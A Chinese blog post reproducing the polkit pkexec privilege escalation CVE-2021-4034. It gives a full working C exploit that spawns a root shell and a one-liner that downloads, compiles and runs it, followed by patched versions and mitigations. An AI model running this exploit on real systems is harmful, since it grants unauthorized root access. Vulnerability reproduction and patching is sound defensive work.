当前位置:   article > 正文

Polkit本地权限提升漏洞(CVE-2021-4034)复现_升级polkit会断开docker网络连接吗

升级polkit会断开docker网络连接吗

本文主要复现2022年1月出现的Polkit的RCE漏洞

1.漏洞影响范围

绝大多数版本linux都在本次影响范围中

漏洞检测方法:
centos:rpm -qa |grep 'polkit'
ubuntu:dpkg -l policykit-1
  • 1
  • 2
  • 3

2.漏洞影响前提条件

-有文件的执行权限
-有gcc编译(最好,没有也可以相同版本下自行编译)

3. 漏洞复现

3.1POC

/*
 * Proof of Concept for PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034) by Andris Raugulis <moo@arthepsy.eu>
 * Advisory: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char *shell = 
	"#include <stdio.h>\n"
	"#include <stdlib.h>\n"
	"#include <unistd.h>\n\n"
	"void gconv() {}\n"
	"void gconv_init() {\n"
	"	setuid(0); setgid(0);\n"
	"	seteuid(0); setegid(0);\n"
	"	system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"
	"	exit(0);\n"
	"}";

int main(int argc, char *argv[]) {
	FILE *fp;
	system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");
	system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");
	fp = fopen("pwnkit/pwnkit.c", "w");
	fprintf(fp, "%s", shell);
	fclose(fp);
	system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
	char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };
	execve("/usr/bin/pkexec", (char*[]){NULL}, env);
	}
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31

适用方法:gcc编译+执行即可

3.2快捷的漏洞利用

wget https://ghproxy.com/https://raw.githubusercontent.com/arthepsy/CVE-2021-4034/main/cve-2021-4034-poc.c && gcc cve-2021-4034-poc.c -o cve-2021-4034-poc && ./cve-2021-4034-poc
  • 1

3.3漏洞结果

运行上述命令后如漏洞为修复便可直接获取root权限。

4.漏洞修复

4.1修复版本

centos:

  • CentOS 6:polkit-0.96-11.el6_10.2
  • CentOS7:polkit-0.112-26.el7_9.1
  • CentOS 8.0:polkit-0.115-13.el8_5.1
  • CentOS 8.2:polkit-0.115-11.el8_2.2
  • CentOS 8.4:polkit-0.115-11.el8_4.2

ubuntu:

  • Ubuntu 20.04 LTS:policykit-1 - 0.105-26ubuntu1.2
  • Ubuntu 18.04 LTS:policykit-1 - 0.105-20ubuntu0.18.04.6
  • Ubuntu 16.04 ESM:policykit-1 - 0.105-14.1ubuntu0.5+esm1
  • Ubuntu 14.04 ESM:policykit-1 - 0.105-4ubuntu3.14.04.6+esm1

4.2 修复方案

4.2.1 参数限定

注:推荐该方案,这种方案下对业务的几乎没有影响


1、修改pkexec的权限:chmod 0755 /usr/bin/pkexec 

2、如果pkexec非必要,可临时删除该可执行程序 
  • 1
  • 2
  • 3
  • 4

4.2.2 版本升级

注:

  • 升级会导致docker、k8s之类的容器服务无法访问,需要在更新后进行重启。如有业务不能重启,建议选择参数限定的方式修复
  • 升级完后需确保polkit升级到了安全版本,有些yum源的版本未更新到安全版本
centos:yum -y install polkit
ubuntu:apt-get install policykit-1

  • 1
  • 2
  • 3

在这里插入图片描述

声明:本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:【wpsshop博客】
推荐阅读
相关标签
  

闽ICP备14008679号